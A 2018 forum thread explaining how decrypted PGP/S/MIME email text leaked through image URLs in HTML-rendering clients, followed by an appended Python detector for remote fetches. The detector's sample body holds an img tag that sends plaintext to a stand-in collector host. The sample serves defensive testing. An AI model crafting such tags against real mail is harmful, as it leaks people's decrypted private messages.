Critical vulnerabilities in PGP/GPG and S/MIME email encrypt

Posted: Mon May 14, 2018 1:23 pm
by walbus

Re: Critical vulnerabilities in PGP/GPG and S/MIME email enc

Posted: Fri May 25, 2018 12:51 pm
by Sicro
This statement is wrong. The vulnerability exists in the email clients, which don't process HTML emails correctly. The decrypted email text is interpreted by the email clients as part of a URL pointing to an image, and when this URL is fetched, the server that is contacted for it gets the URL with the decrypted email text. The encryption is therefore not cracked.

A new version of the add-on "Enigmail" for Thunderbird has already been released, which closes this vulnerability. A fix from the Thunderbird developers would have taken longer, so the Enigmail developers did the fix.

HTML emails are usually bad from a security point of view. People who had disabled the display of HTML emails in their email client were not affected by this vulnerability.

Re: Critical vulnerabilities in PGP/GPG and S/MIME email enc

Posted: Fri May 25, 2018 1:06 pm
by NicTheQuick
In fact Thunderbird was not affected with unchanged settings because it never loads external resources without asking you first.
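
The two points made above (decrypted text ending up inside an image URL, and clients that do not load external resources being unaffected) can be checked on the receiving side. The following is an added example, not part of the original thread and not Enigmail or Thunderbird code: it lists the remote fetches a decrypted HTML body would trigger if rendered. The function names, the host name, the sample body and the whitespace heuristic are assumptions made for illustration.

```python
from html.parser import HTMLParser

# Attributes that make a client fetch a resource while rendering a message.
FETCH_ATTRS = {"src", "background", "poster"}
REMOTE_PREFIXES = ("http://", "https://", "//")


class RemoteFetchFinder(HTMLParser):
    """Collects (tag, attribute, url) for every remote resource reference."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.fetches = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if not value:
                continue
            # <link href=...> also triggers a fetch (stylesheets, icons).
            fetching = name in FETCH_ATTRS or (tag == "link" and name == "href")
            if fetching and value.strip().lower().startswith(REMOTE_PREFIXES):
                self.fetches.append((tag, name, value))


def remote_fetches(html):
    """Return the remote references found in an HTML body."""
    finder = RemoteFetchFinder()
    finder.feed(html)
    finder.close()
    return finder.fetches


def carries_text(url):
    """Heuristic (assumption): legitimate image URLs do not contain raw
    whitespace; message text swallowed into a URL usually does."""
    return any(ch.isspace() for ch in url.strip())


# Constructed sample of a body after decryption, where plaintext has become
# part of an image URL. example.invalid is a reserved, non-resolving name.
SAMPLE = (
    "<p>hello</p>\n"
    '<img src="http://collector.example.invalid/Meeting moved\nto 3pm, room 4">\n'
    '<img src="cid:logo123">\n'
)

if __name__ == "__main__":
    for tag, attr, url in remote_fetches(SAMPLE):
        flag = "BLOCK (contains body text?)" if carries_text(url) else "block"
        print(f"{flag}: <{tag} {attr}> -> {url!r}")
```

A client that refuses every entry returned by `remote_fetches` unless the user approves it never sends the URL, which is the behaviour described in the last post.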